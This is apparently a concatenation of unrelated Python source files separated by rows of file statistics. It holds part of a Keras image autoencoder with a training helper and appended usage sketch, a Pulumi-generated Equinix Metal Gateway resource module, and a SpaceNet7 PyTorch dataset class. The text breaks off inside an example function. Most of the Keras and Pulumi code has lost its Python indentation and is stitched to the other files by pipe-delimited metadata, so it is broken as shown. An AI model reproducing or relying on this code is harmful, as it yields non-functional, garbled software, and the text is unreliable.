x=keras.layers.Conv2DTranspose(filters=self.filters[len(self.filters)-idx-1],kernel_size=self.kernel_size[len(self.kernel_size)-idx-1],activation='relu',padding='same')(x)
x=keras.layers.BatchNormalization()(x)
x=keras.layers.UpSampling2D((2,2))(x)
x=keras.layers.Dropout(0.2)(x)
Decoder_Output=keras.layers.Conv2DTranspose(filters=1,kernel_size=3,activation='sigmoid',padding='same',name='Decoder_Output_1D')(x)
self.DecoderMode=keras.models.Model(inputs=Decoder_Input,outputs=Decoder_Output)
self.DecoderMode.summary()
self.DecoderMode.compile(loss='mse',optimizer='adam')
def ResidualConnectionEncoder(self):
self.Encoder_Input=keras.Input(shape=self.ImageShape,name='Encoder_Input_2D')
x=self.Encoder_Input
for idx,_ in enumerate(self.filters):
x=keras.layers.Conv2D(filters=self.filters[idx],kernel_size=self.kernel_size[idx],activation='relu',padding='same')(x)
x=keras.layers.BatchNormalization()(x)
x=keras.layers.MaxPool2D((2,2))(x)
x=keras.layers.Dropout(0.2)(x)
if idx==0:
residual=keras.layers.Conv2D(filters=self.filters[idx],kernel_size=5,padding='same')(self.Encoder_Input)
residual=keras.layers.BatchNormalization()(residual)
residual=keras.layers.MaxPool2D((2,2))(residual)
x=keras.layers.add([x,residual])
if idx==1:
residual=keras.layers.Conv2D(filters=self.filters[idx],kernel_size=5,padding='same')(self.Encoder_Input)
residual=keras.layers.BatchNormalization()(residual)
residual=keras.layers.MaxPool2D((4,4))(residual)
x=keras.layers.add([x,residual])
# residual=keras.layers.Conv2D(filters=self.filters[-1],kernel_size=3,strides=2**len(self.filters),padding='same')(self.Encoder_Input)
# x=keras.layers.add([x,residual])
self.shape=keras.backend.int_shape(x)
# print(self.shape)
x=keras.layers.Flatten()(x)
        Encoder_Output=keras.layers.Dense(self.latent_dim,name='Encoder_Output_1D')(x)
self.EncoderMode=keras.models.Model(inputs=self.Encoder_Input,outputs=Encoder_Output,name='EncoderPart')
self.EncoderMode.summary()
self.EncoderMode.compile(loss='mse',optimizer='adam')
def ResidualConnectionDecoder(self):
Decoder_Input=keras.Input(shape=(self.latent_dim,),name='Decoder_Input_1D')
x=keras.layers.Dense(self.shape[1]*self.shape[2]*self.shape[3])(Decoder_Input)
x=keras.layers.Reshape((self.shape[1],self.shape[2],self.shape[3]))(x)
for idx,_ in enumerate(self.filters):
x=keras.layers.Conv2DTranspose(filters=self.filters[len(self.filters)-idx-1],kernel_size=self.kernel_size[len(self.kernel_size)-idx-1],activation='relu',padding='same')(x)
x=keras.layers.BatchNormalization()(x)
x=keras.layers.UpSampling2D((2,2))(x)
Decoder_Output=keras.layers.Conv2DTranspose(filters=1,kernel_size=3,activation='sigmoid',padding='same',name='Decoder_Output_1D')(x)
self.DecoderMode=keras.models.Model(inputs=Decoder_Input,outputs=Decoder_Output)
self.DecoderMode.summary()
self.DecoderMode.compile(loss='mse',optimizer='adam')
def AtrousEncoder(self):
self.Encoder_Input=keras.Input(shape=self.ImageShape,name='Encoder_Input_2D')
x=self.Encoder_Input
for idx,_ in enumerate(self.filters):
x=keras.layers.Conv2D(filters=self.filters[idx],kernel_size=self.kernel_size[idx],activation='relu',padding='same',dilation_rate=idx+1)(x)
x=keras.layers.BatchNormalization()(x)
x=keras.layers.MaxPool2D((2,2))(x)
x=keras.layers.BatchNormalization()(x)
# if idx==1:
# residual=keras.layers.Conv2D(filters=self.filters[idx],kernel_size=3,padding='same')(self.Encoder_Input)
# residual=keras.layers.MaxPool2D((4,4))(residual)
# x=keras.layers.add([x,residual])
# residual=keras.layers.Conv2D(filters=self.filters[-1],kernel_size=3,strides=2**len(self.filters),padding='same')(self.Encoder_Input)
# x=keras.layers.add([x,residual])
self.shape=keras.backend.int_shape(x)
# print(self.shape)
x=keras.layers.Flatten()(x)
        Encoder_Output=keras.layers.Dense(self.latent_dim,name='Encoder_Output_1D')(x)
self.EncoderMode=keras.models.Model(inputs=self.Encoder_Input,outputs=Encoder_Output,name='EncoderPart')
self.EncoderMode.summary()
self.EncoderMode.compile(loss='mse',optimizer='adam')
def AtrousDecoder(self):
Decoder_Input=keras.Input(shape=(self.latent_dim,),name='Decoder_Input_1D')
x=keras.layers.Dense(self.shape[1]*self.shape[2]*self.shape[3])(Decoder_Input)
x=keras.layers.Reshape((self.shape[1],self.shape[2],self.shape[3]))(x)
for idx,_ in enumerate(self.filters):
x=keras.layers.Conv2DTranspose(filters=self.filters[len(self.filters)-idx-1],kernel_size=self.kernel_size[len(self.kernel_size)-idx-1],activation='relu',padding='same',dilation_rate=len(self.kernel_size)-idx)(x)
x=keras.layers.BatchNormalization()(x)
x=keras.layers.UpSampling2D((2,2))(x)
x=keras.layers.BatchNormalization()(x)
Decoder_Output=keras.layers.Conv2DTranspose(filters=1,kernel_size=3,activation='sigmoid',padding='same',name='Decoder_Output_1D')(x)
self.DecoderMode=keras.models.Model(inputs=Decoder_Input,outputs=Decoder_Output)
# self.DecoderMode.summary()
self.DecoderMode.compile(loss='mse',optimizer='adam')
def BuildAutoEncoder(ImageShape=(32,32,1),filters=[32,64,128],kernel_size=[5,5,5],latent_dim=256):
AutoEncoder_=AutoEncoder(ImageShape,filters,kernel_size,latent_dim)
AutoEncoder_.Encoder()
AutoEncoder_.Decoder()
AutoEncoderMode=keras.models.Model(inputs=AutoEncoder_.Encoder_Input,outputs=AutoEncoder_.DecoderMode(AutoEncoder_.EncoderMode(AutoEncoder_.Encoder_Input)),name='AutoEncoderMode')
AutoEncoderMode.summary()
AutoEncoderMode.compile(loss='mse',optimizer='adam')
return AutoEncoderMode
def BuildDropOutAutoEncoder(ImageShape=(32,32,1),filters=[32,64,128],kernel_size=[5,5,5],latent_dim=256):
AutoEncoder_=AutoEncoder(ImageShape,filters,kernel_size,latent_dim)
AutoEncoder_.DropOutEncoder()
AutoEncoder_.DropOutDecoder()
AutoEncoderMode=keras.models.Model(inputs=AutoEncoder_.Encoder_Input,outputs=AutoEncoder_.DecoderMode(AutoEncoder_.EncoderMode(AutoEncoder_.Encoder_Input)),name='AutoEncoderMode')
AutoEncoderMode.summary()
AutoEncoderMode.compile(loss='mse',optimizer='adam')
return AutoEncoderMode
def BuildResidualConnectionAutoEncoder(ImageShape=(32,32,1),filters=[32,64,128],kernel_size=[5,5,5],latent_dim=256):
AutoEncoder_=AutoEncoder(ImageShape,filters,kernel_size,latent_dim)
AutoEncoder_.ResidualConnectionEncoder()
AutoEncoder_.ResidualConnectionDecoder()
AutoEncoderMode=keras.models.Model(inputs=AutoEncoder_.Encoder_Input,outputs=AutoEncoder_.DecoderMode(AutoEncoder_.EncoderMode(AutoEncoder_.Encoder_Input)),name='AutoEncoderMode')
AutoEncoderMode.summary()
AutoEncoderMode.compile(loss='mse',optimizer='adam')
return AutoEncoderMode
def BuildAtrousAutoEncoder(ImageShape=(32,32,1),filters=[32,64,128],kernel_size=[5,5,5],latent_dim=256):
AutoEncoder_=AutoEncoder(ImageShape,filters,kernel_size,latent_dim)
AutoEncoder_.AtrousEncoder()
AutoEncoder_.AtrousDecoder()
AutoEncoderMode=keras.models.Model(inputs=AutoEncoder_.Encoder_Input,outputs=AutoEncoder_.DecoderMode(AutoEncoder_.EncoderMode(AutoEncoder_.Encoder_Input)),name='AutoEncoderMode')
AutoEncoderMode.summary()
AutoEncoderMode.compile(loss='mse',optimizer='adam')
return AutoEncoderMode
def AutoEncoderTraining(Model,epochs,inputs_train,outputs_train,inputs_validation,outputs_validation,save_path_name):
callbacks_list=[keras.callbacks.ModelCheckpoint(filepath=save_path_name+'.h5',monitor='val_loss',save_best_only=True),\
keras.callbacks.TensorBoard(log_dir='./TensorBoard',histogram_freq=1,write_graph=True,write_images=True)]
history=Model.fit(inputs_train,outputs_train,epochs=epochs,batch_size=64,callbacks=callbacks_list,validation_data=(inputs_validation,outputs_validation))
test_loss=Model.evaluate(inputs_validation,outputs_validation)
return history,test_loss,Model
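# --- Editor's usage sketch (not in the original file) --------------------------
# Build the plain autoencoder and fit it on random 32x32 patches. Shapes follow
# the BuildAutoEncoder defaults; the noisy/clean arrays below are placeholders
# for real GPR training data.
if __name__ == '__main__':
    import numpy as np
    model = BuildAutoEncoder(ImageShape=(32, 32, 1))
    noisy = np.random.rand(128, 32, 32, 1).astype('float32')   # network input
    clean = np.random.rand(128, 32, 32, 1).astype('float32')   # denoising target
    history, test_loss, model = AutoEncoderTraining(
        model, epochs=2,
        inputs_train=noisy[:96], outputs_train=clean[:96],
        inputs_validation=noisy[96:], outputs_validation=clean[96:],
        save_path_name='AutoEncoder_demo')
    print('validation loss:', test_loss)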
| 60.425121
| 223
| 0.70291
| 1,592
| 12,508
| 5.380653
| 0.087312
| 0.088606
| 0.067243
| 0.03187
| 0.867733
| 0.865165
| 0.85816
| 0.854424
| 0.850222
| 0.850222
| 0
| 0.021176
| 0.150544
| 12,508
| 206
| 224
| 60.718447
| 0.785035
| 0.095139
| 0
| 0.754717
| 0
| 0
| 0.0521
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.08805
| false
| 0
| 0.006289
| 0
| 0.132075
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ac6cb36cb38e4278f94e8ec499ce8b27019a19d3
| 17,087
|
py
|
Python
|
sdk/python/pulumi_equinix_metal/gateway.py
|
pulumi/pulumi-equinix-metal
|
79213497bddc7ae806d3b27c3f349fdff935a19f
|
[
"ECL-2.0",
"Apache-2.0"
] | 1
|
2021-01-08T21:57:33.000Z
|
2021-01-08T21:57:33.000Z
|
sdk/python/pulumi_equinix_metal/gateway.py
|
pulumi/pulumi-equinix-metal
|
79213497bddc7ae806d3b27c3f349fdff935a19f
|
[
"ECL-2.0",
"Apache-2.0"
] | 33
|
2020-12-23T21:37:39.000Z
|
2022-03-25T19:23:17.000Z
|
sdk/python/pulumi_equinix_metal/gateway.py
|
pulumi/pulumi-equinix-metal
|
79213497bddc7ae806d3b27c3f349fdff935a19f
|
[
"ECL-2.0",
"Apache-2.0"
] | 1
|
2021-01-08T21:24:44.000Z
|
2021-01-08T21:24:44.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
__all__ = ['GatewayArgs', 'Gateway']
@pulumi.input_type
class GatewayArgs:
def __init__(__self__, *,
project_id: pulumi.Input[str],
vlan_id: pulumi.Input[str],
ip_reservation_id: Optional[pulumi.Input[str]] = None,
private_ipv4_subnet_size: Optional[pulumi.Input[int]] = None):
"""
The set of arguments for constructing a Gateway resource.
:param pulumi.Input[str] project_id: UUID of the project where the gateway is scoped to
:param pulumi.Input[str] vlan_id: UUID of the VLAN where the gateway is scoped to
:param pulumi.Input[str] ip_reservation_id: UUID of IP reservation block to bind to the gateway, the reservation must be in the same metro as the VLAN, conflicts with `private_ipv4_subnet_size`
:param pulumi.Input[int] private_ipv4_subnet_size: Size of the private IPv4 subnet to create for this metal gateway, must be one of (8, 16, 32, 64, 128), conflicts with `ip_reservation_id`
"""
pulumi.set(__self__, "project_id", project_id)
pulumi.set(__self__, "vlan_id", vlan_id)
if ip_reservation_id is not None:
pulumi.set(__self__, "ip_reservation_id", ip_reservation_id)
if private_ipv4_subnet_size is not None:
pulumi.set(__self__, "private_ipv4_subnet_size", private_ipv4_subnet_size)
@property
@pulumi.getter(name="projectId")
def project_id(self) -> pulumi.Input[str]:
"""
UUID of the project where the gateway is scoped to
"""
return pulumi.get(self, "project_id")
@project_id.setter
def project_id(self, value: pulumi.Input[str]):
pulumi.set(self, "project_id", value)
@property
@pulumi.getter(name="vlanId")
def vlan_id(self) -> pulumi.Input[str]:
"""
UUID of the VLAN where the gateway is scoped to
"""
return pulumi.get(self, "vlan_id")
@vlan_id.setter
def vlan_id(self, value: pulumi.Input[str]):
pulumi.set(self, "vlan_id", value)
@property
@pulumi.getter(name="ipReservationId")
def ip_reservation_id(self) -> Optional[pulumi.Input[str]]:
"""
UUID of IP reservation block to bind to the gateway, the reservation must be in the same metro as the VLAN, conflicts with `private_ipv4_subnet_size`
"""
return pulumi.get(self, "ip_reservation_id")
@ip_reservation_id.setter
def ip_reservation_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "ip_reservation_id", value)
@property
@pulumi.getter(name="privateIpv4SubnetSize")
def private_ipv4_subnet_size(self) -> Optional[pulumi.Input[int]]:
"""
Size of the private IPv4 subnet to create for this metal gateway, must be one of (8, 16, 32, 64, 128), conflicts with `ip_reservation_id`
"""
return pulumi.get(self, "private_ipv4_subnet_size")
@private_ipv4_subnet_size.setter
def private_ipv4_subnet_size(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "private_ipv4_subnet_size", value)
@pulumi.input_type
class _GatewayState:
def __init__(__self__, *,
ip_reservation_id: Optional[pulumi.Input[str]] = None,
private_ipv4_subnet_size: Optional[pulumi.Input[int]] = None,
project_id: Optional[pulumi.Input[str]] = None,
state: Optional[pulumi.Input[str]] = None,
vlan_id: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering Gateway resources.
:param pulumi.Input[str] ip_reservation_id: UUID of IP reservation block to bind to the gateway, the reservation must be in the same metro as the VLAN, conflicts with `private_ipv4_subnet_size`
:param pulumi.Input[int] private_ipv4_subnet_size: Size of the private IPv4 subnet to create for this metal gateway, must be one of (8, 16, 32, 64, 128), conflicts with `ip_reservation_id`
:param pulumi.Input[str] project_id: UUID of the project where the gateway is scoped to
:param pulumi.Input[str] state: Status of the gateway resource
:param pulumi.Input[str] vlan_id: UUID of the VLAN where the gateway is scoped to
"""
if ip_reservation_id is not None:
pulumi.set(__self__, "ip_reservation_id", ip_reservation_id)
if private_ipv4_subnet_size is not None:
pulumi.set(__self__, "private_ipv4_subnet_size", private_ipv4_subnet_size)
if project_id is not None:
pulumi.set(__self__, "project_id", project_id)
if state is not None:
pulumi.set(__self__, "state", state)
if vlan_id is not None:
pulumi.set(__self__, "vlan_id", vlan_id)
@property
@pulumi.getter(name="ipReservationId")
def ip_reservation_id(self) -> Optional[pulumi.Input[str]]:
"""
UUID of IP reservation block to bind to the gateway, the reservation must be in the same metro as the VLAN, conflicts with `private_ipv4_subnet_size`
"""
return pulumi.get(self, "ip_reservation_id")
@ip_reservation_id.setter
def ip_reservation_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "ip_reservation_id", value)
@property
@pulumi.getter(name="privateIpv4SubnetSize")
def private_ipv4_subnet_size(self) -> Optional[pulumi.Input[int]]:
"""
Size of the private IPv4 subnet to create for this metal gateway, must be one of (8, 16, 32, 64, 128), conflicts with `ip_reservation_id`
"""
return pulumi.get(self, "private_ipv4_subnet_size")
@private_ipv4_subnet_size.setter
def private_ipv4_subnet_size(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "private_ipv4_subnet_size", value)
@property
@pulumi.getter(name="projectId")
def project_id(self) -> Optional[pulumi.Input[str]]:
"""
UUID of the project where the gateway is scoped to
"""
return pulumi.get(self, "project_id")
@project_id.setter
def project_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "project_id", value)
@property
@pulumi.getter
def state(self) -> Optional[pulumi.Input[str]]:
"""
Status of the gateway resource
"""
return pulumi.get(self, "state")
@state.setter
def state(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "state", value)
@property
@pulumi.getter(name="vlanId")
def vlan_id(self) -> Optional[pulumi.Input[str]]:
"""
UUID of the VLAN where the gateway is scoped to
"""
return pulumi.get(self, "vlan_id")
@vlan_id.setter
def vlan_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "vlan_id", value)
class Gateway(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
ip_reservation_id: Optional[pulumi.Input[str]] = None,
private_ipv4_subnet_size: Optional[pulumi.Input[int]] = None,
project_id: Optional[pulumi.Input[str]] = None,
vlan_id: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Use this resource to create Metal Gateway resources in Equinix Metal.
## Example Usage
```python
import pulumi
import pulumi_equinix_metal as equinix_metal
# Create Metal Gateway for a VLAN with a private IPv4 block with 8 IP addresses
test_vlan = equinix_metal.Vlan("testVlan",
description="test VLAN in SV",
metro="sv",
project_id=local["project_id"])
test_gateway = equinix_metal.Gateway("testGateway",
project_id=local["project_id"],
vlan_id=test_vlan.id,
private_ipv4_subnet_size=8)
```
```python
import pulumi
import pulumi_equinix_metal as equinix_metal
# Create Metal Gateway for a VLAN and reserved IP address block
test_vlan = equinix_metal.Vlan("testVlan",
description="test VLAN in SV",
metro="sv",
project_id=local["project_id"])
test_reserved_ip_block = equinix_metal.ReservedIpBlock("testReservedIpBlock",
project_id=local["project_id"],
metro="sv",
quantity=2)
test_gateway = equinix_metal.Gateway("testGateway",
project_id=local["project_id"],
vlan_id=test_vlan.id,
ip_reservation_id=test_reserved_ip_block.id)
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] ip_reservation_id: UUID of IP reservation block to bind to the gateway, the reservation must be in the same metro as the VLAN, conflicts with `private_ipv4_subnet_size`
:param pulumi.Input[int] private_ipv4_subnet_size: Size of the private IPv4 subnet to create for this metal gateway, must be one of (8, 16, 32, 64, 128), conflicts with `ip_reservation_id`
:param pulumi.Input[str] project_id: UUID of the project where the gateway is scoped to
:param pulumi.Input[str] vlan_id: UUID of the VLAN where the gateway is scoped to
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: GatewayArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Use this resource to create Metal Gateway resources in Equinix Metal.
## Example Usage
```python
import pulumi
import pulumi_equinix_metal as equinix_metal
# Create Metal Gateway for a VLAN with a private IPv4 block with 8 IP addresses
test_vlan = equinix_metal.Vlan("testVlan",
description="test VLAN in SV",
metro="sv",
project_id=local["project_id"])
test_gateway = equinix_metal.Gateway("testGateway",
project_id=local["project_id"],
vlan_id=test_vlan.id,
private_ipv4_subnet_size=8)
```
```python
import pulumi
import pulumi_equinix_metal as equinix_metal
# Create Metal Gateway for a VLAN and reserved IP address block
test_vlan = equinix_metal.Vlan("testVlan",
description="test VLAN in SV",
metro="sv",
project_id=local["project_id"])
test_reserved_ip_block = equinix_metal.ReservedIpBlock("testReservedIpBlock",
project_id=local["project_id"],
metro="sv",
quantity=2)
test_gateway = equinix_metal.Gateway("testGateway",
project_id=local["project_id"],
vlan_id=test_vlan.id,
ip_reservation_id=test_reserved_ip_block.id)
```
:param str resource_name: The name of the resource.
:param GatewayArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(GatewayArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
ip_reservation_id: Optional[pulumi.Input[str]] = None,
private_ipv4_subnet_size: Optional[pulumi.Input[int]] = None,
project_id: Optional[pulumi.Input[str]] = None,
vlan_id: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = GatewayArgs.__new__(GatewayArgs)
__props__.__dict__["ip_reservation_id"] = ip_reservation_id
__props__.__dict__["private_ipv4_subnet_size"] = private_ipv4_subnet_size
if project_id is None and not opts.urn:
raise TypeError("Missing required property 'project_id'")
__props__.__dict__["project_id"] = project_id
if vlan_id is None and not opts.urn:
raise TypeError("Missing required property 'vlan_id'")
__props__.__dict__["vlan_id"] = vlan_id
__props__.__dict__["state"] = None
super(Gateway, __self__).__init__(
'equinix-metal:index/gateway:Gateway',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
ip_reservation_id: Optional[pulumi.Input[str]] = None,
private_ipv4_subnet_size: Optional[pulumi.Input[int]] = None,
project_id: Optional[pulumi.Input[str]] = None,
state: Optional[pulumi.Input[str]] = None,
vlan_id: Optional[pulumi.Input[str]] = None) -> 'Gateway':
"""
Get an existing Gateway resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] ip_reservation_id: UUID of IP reservation block to bind to the gateway, the reservation must be in the same metro as the VLAN, conflicts with `private_ipv4_subnet_size`
:param pulumi.Input[int] private_ipv4_subnet_size: Size of the private IPv4 subnet to create for this metal gateway, must be one of (8, 16, 32, 64, 128), conflicts with `ip_reservation_id`
:param pulumi.Input[str] project_id: UUID of the project where the gateway is scoped to
:param pulumi.Input[str] state: Status of the gateway resource
:param pulumi.Input[str] vlan_id: UUID of the VLAN where the gateway is scoped to
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _GatewayState.__new__(_GatewayState)
__props__.__dict__["ip_reservation_id"] = ip_reservation_id
__props__.__dict__["private_ipv4_subnet_size"] = private_ipv4_subnet_size
__props__.__dict__["project_id"] = project_id
__props__.__dict__["state"] = state
__props__.__dict__["vlan_id"] = vlan_id
return Gateway(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="ipReservationId")
def ip_reservation_id(self) -> pulumi.Output[Optional[str]]:
"""
UUID of IP reservation block to bind to the gateway, the reservation must be in the same metro as the VLAN, conflicts with `private_ipv4_subnet_size`
"""
return pulumi.get(self, "ip_reservation_id")
@property
@pulumi.getter(name="privateIpv4SubnetSize")
def private_ipv4_subnet_size(self) -> pulumi.Output[Optional[int]]:
"""
Size of the private IPv4 subnet to create for this metal gateway, must be one of (8, 16, 32, 64, 128), conflicts with `ip_reservation_id`
"""
return pulumi.get(self, "private_ipv4_subnet_size")
@property
@pulumi.getter(name="projectId")
def project_id(self) -> pulumi.Output[str]:
"""
UUID of the project where the gateway is scoped to
"""
return pulumi.get(self, "project_id")
@property
@pulumi.getter
def state(self) -> pulumi.Output[str]:
"""
Status of the gateway resource
"""
return pulumi.get(self, "state")
@property
@pulumi.getter(name="vlanId")
def vlan_id(self) -> pulumi.Output[str]:
"""
UUID of the VLAN where the gateway is scoped to
"""
return pulumi.get(self, "vlan_id")
| 43.700767
| 201
| 0.650026
| 2,187
| 17,087
| 4.806584
| 0.078189
| 0.064878
| 0.062595
| 0.079909
| 0.843798
| 0.826484
| 0.808314
| 0.788432
| 0.782439
| 0.767409
| 0
| 0.010159
| 0.256862
| 17,087
| 390
| 202
| 43.812821
| 0.817688
| 0.392813
| 0
| 0.630208
| 1
| 0
| 0.107894
| 0.034049
| 0
| 0
| 0
| 0
| 0
| 1
| 0.15625
| false
| 0.005208
| 0.026042
| 0
| 0.276042
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ac710710dd13ab1f6fe0b43d6c52e17e05897eaa
| 7,197
|
py
|
Python
|
4-motokimura/code/spacenet7_model/datasets/spacenet7.py
|
remtav/SpaceNet7_Multi-Temporal_Solutions
|
ee535c61fc22bffa45331519239c6d1b044b1514
|
[
"Apache-2.0"
] | 38
|
2021-02-18T07:04:54.000Z
|
2022-03-22T15:31:06.000Z
|
4-motokimura/code/spacenet7_model/datasets/spacenet7.py
|
remtav/SpaceNet7_Multi-Temporal_Solutions
|
ee535c61fc22bffa45331519239c6d1b044b1514
|
[
"Apache-2.0"
] | 2
|
2021-02-22T18:53:19.000Z
|
2021-06-22T20:28:06.000Z
|
4-motokimura/code/spacenet7_model/datasets/spacenet7.py
|
remtav/SpaceNet7_Multi-Temporal_Solutions
|
ee535c61fc22bffa45331519239c6d1b044b1514
|
[
"Apache-2.0"
] | 15
|
2021-02-25T17:25:40.000Z
|
2022-01-31T16:59:32.000Z
|
import json
import numpy as np
from skimage import io
from torch.utils.data import Dataset
class SpaceNet7Dataset(Dataset):
CLASSES = [
'building_footprint', # 1st (R) channel in mask
'building_boundary', # 2nd (G) channel in mask
'building_contact', # 3rd (B) channel in mask
]
def __init__(self,
config,
data_list,
augmentation=None,
preprocessing=None):
"""[summary]
Args:
config ([type]): [description]
data_list ([type]): [description]
augmentation ([type], optional): [description]. Defaults to None.
preprocessing ([type], optional): [description]. Defaults to None.
"""
# generate full path to image/label files
self.image_paths, self.mask_paths = [], []
for data in data_list:
self.image_paths.append(data['image_masked'])
self.mask_paths.append(data['building_mask'])
# path to previous frame
if config.INPUT.CONCAT_PREV_FRAME:
self.image_prev_paths = []
for data in data_list:
self.image_prev_paths.append(data['image_masked_prev'])
# path to next frame
if config.INPUT.CONCAT_NEXT_FRAME:
self.image_next_paths = []
for data in data_list:
self.image_next_paths.append(data['image_masked_next'])
# convert str names to class values on masks
classes = config.INPUT.CLASSES
if not classes:
# if classes is empty, use all classes
classes = self.CLASSES
self.class_values = [self.CLASSES.index(c) for c in classes]
self.device = config.MODEL.DEVICE
self.augmentation = augmentation
self.preprocessing = preprocessing
self.in_channels = config.MODEL.IN_CHANNELS
assert self.in_channels in [3, 4]
self.concat_prev_frame = config.INPUT.CONCAT_PREV_FRAME
self.concat_next_frame = config.INPUT.CONCAT_NEXT_FRAME
def __getitem__(self, i):
"""[summary]
Args:
i ([type]): [description]
Returns:
[type]: [description]
"""
image = io.imread(self.image_paths[i])
mask = io.imread(self.mask_paths[i])
if self.in_channels == 3:
# remove alpha channel
image = image[:, :, :3]
_, _, c = image.shape
assert c == self.in_channels
# concat previous frame
if self.concat_prev_frame:
image_prev = io.imread(self.image_prev_paths[i])
if self.in_channels == 3:
image_prev = image_prev[:, :, :3]
_, _, c = image_prev.shape
assert c == self.in_channels
image = np.concatenate([image_prev, image], axis=2)
# concat next frame
if self.concat_next_frame:
image_next = io.imread(self.image_next_paths[i])
if self.in_channels == 3:
image_next = image_next[:, :, :3]
_, _, c = image_next.shape
assert c == self.in_channels
image = np.concatenate([image, image_next], axis=2)
# extract certain classes from mask
masks = [(mask[:, :, v] > 0) for v in self.class_values]
mask = np.stack(masks,
axis=-1).astype('float') # XXX: multi class setting.
# apply augmentations
if self.augmentation:
sample = self.augmentation(image=image, mask=mask)
image, mask = sample['image'], sample['mask']
# apply preprocessing
if self.preprocessing:
sample = self.preprocessing(image=image, mask=mask)
image, mask = sample['image'], sample['mask']
return image, mask
def __len__(self):
"""[summary]
Returns:
[type]: [description]
"""
return len(self.image_paths)
class SpaceNet7TestDataset(Dataset):
def __init__(self,
config,
data_list,
augmentation=None,
preprocessing=None):
"""[summary]
Args:
config ([type]): [description]
data_list ([type]): [description]
augmentation ([type], optional): [description]. Defaults to None.
preprocessing ([type], optional): [description]. Defaults to None.
"""
# generate full path to image/label files
self.image_paths = []
for data in data_list:
self.image_paths.append(data['image_masked'])
# path to previous frame
if config.INPUT.CONCAT_PREV_FRAME:
self.image_prev_paths = []
for data in data_list:
self.image_prev_paths.append(data['image_masked_prev'])
# path to next frame
if config.INPUT.CONCAT_NEXT_FRAME:
self.image_next_paths = []
for data in data_list:
self.image_next_paths.append(data['image_masked_next'])
self.device = config.MODEL.DEVICE
self.augmentation = augmentation
self.preprocessing = preprocessing
self.in_channels = config.MODEL.IN_CHANNELS
assert self.in_channels in [3, 4]
self.concat_prev_frame = config.INPUT.CONCAT_PREV_FRAME
self.concat_next_frame = config.INPUT.CONCAT_NEXT_FRAME
def __getitem__(self, i):
"""[summary]
Args:
i ([type]): [description]
Returns:
[type]: [description]
"""
image_path = self.image_paths[i]
image = io.imread(image_path)
if self.in_channels == 3:
# remove alpha channel
image = image[:, :, :3]
_, _, c = image.shape
assert c == self.in_channels
# concat previous frame
if self.concat_prev_frame:
image_prev = io.imread(self.image_prev_paths[i])
if self.in_channels == 3:
image_prev = image_prev[:, :, :3]
_, _, c = image_prev.shape
assert c == self.in_channels
image = np.concatenate([image_prev, image], axis=2)
# concat next frame
if self.concat_next_frame:
image_next = io.imread(self.image_next_paths[i])
if self.in_channels == 3:
image_next = image_next[:, :, :3]
_, _, c = image_next.shape
assert c == self.in_channels
image = np.concatenate([image, image_next], axis=2)
original_shape = image.shape
# apply augmentations
if self.augmentation:
sample = self.augmentation(image=image)
image = sample['image']
# apply preprocessing
if self.preprocessing:
sample = self.preprocessing(image=image)
image = sample['image']
return {
'image': image,
'image_path': image_path,
'original_shape': original_shape,
}
def __len__(self):
"""[summary]
Returns:
[type]: [description]
"""
return len(self.image_paths)
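# A hedged usage sketch (not from the original repository): building a
# SpaceNet7Dataset and wrapping it in a PyTorch DataLoader. The config object is a
# stand-in exposing only the attributes this module reads, and the file paths are
# placeholders.
def _example_build_loader():
    from types import SimpleNamespace
    from torch.utils.data import DataLoader

    config = SimpleNamespace(
        INPUT=SimpleNamespace(
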